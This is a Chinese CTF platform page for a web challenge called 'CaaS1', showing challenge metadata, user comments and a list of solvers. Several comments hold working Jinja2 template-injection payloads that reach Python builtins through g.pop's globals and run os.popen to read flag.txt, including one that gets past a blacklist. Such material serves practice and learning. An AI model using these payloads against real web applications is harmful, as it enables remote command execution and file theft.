CaaS1WEB 未解决

分数: 40 金币: 4
题目作者: Aman
一  血: Paradiso
一血奖励: 4金币
解  决: 63
提  示:
描  述:
CaaS1
其  他: server.zip
评论
124要留就要77 2月前

name={{g.pop["__global""s__"].__builtins__.eval(request.form.team_name)}}&team_name=__import__("os").popen("cat flag.txt").read() 直接获取flag

回复 0

baozongwi 10月前

会不会出题大哥,这黑名单里面有[]为什么这样子还能过 name={{g.pop["__global""s__"].__builtins__.eval(request.args.x)}}&team_name=g 怎么回事

回复 0

网络小钦 1年前

看不懂啊

回复 0

2552758573 1年前

payload太长了,绕不过去

回复 0

沐沐 2年前

这个题什么意思

回复 0
沐沐 1年前

@cgxx 懂了 好玩这个题

回复 0

cgxx 2年前

模板注入

回复 0

WriteUp

image
vchopin

2 金币

评分(1)

解题动态

zhuyh69 攻破了该题 7小时前
姥姥 攻破了该题 2天前
chaio 攻破了该题 29天前
3229722202 攻破了该题 1月前
15325870583 攻破了该题 1月前
Oak123782 攻破了该题 1月前
td0756 攻破了该题 2月前
Hehe0619 攻破了该题 2月前
bugkuctfmike6 攻破了该题 2月前
caterpie771 攻破了该题 2月前
124要留就要77 攻破了该题 2月前
The-Beacon 攻破了该题 3月前
lzq2000 攻破了该题 3月前
SUSAN777 攻破了该题 3月前
yht111 攻破了该题 3月前
gaohaofeng 攻破了该题 3月前
a5580990 攻破了该题 4月前
TKar0 攻破了该题 4月前
llc123 攻破了该题 4月前
18075013015 攻破了该题 4月前
问题反馈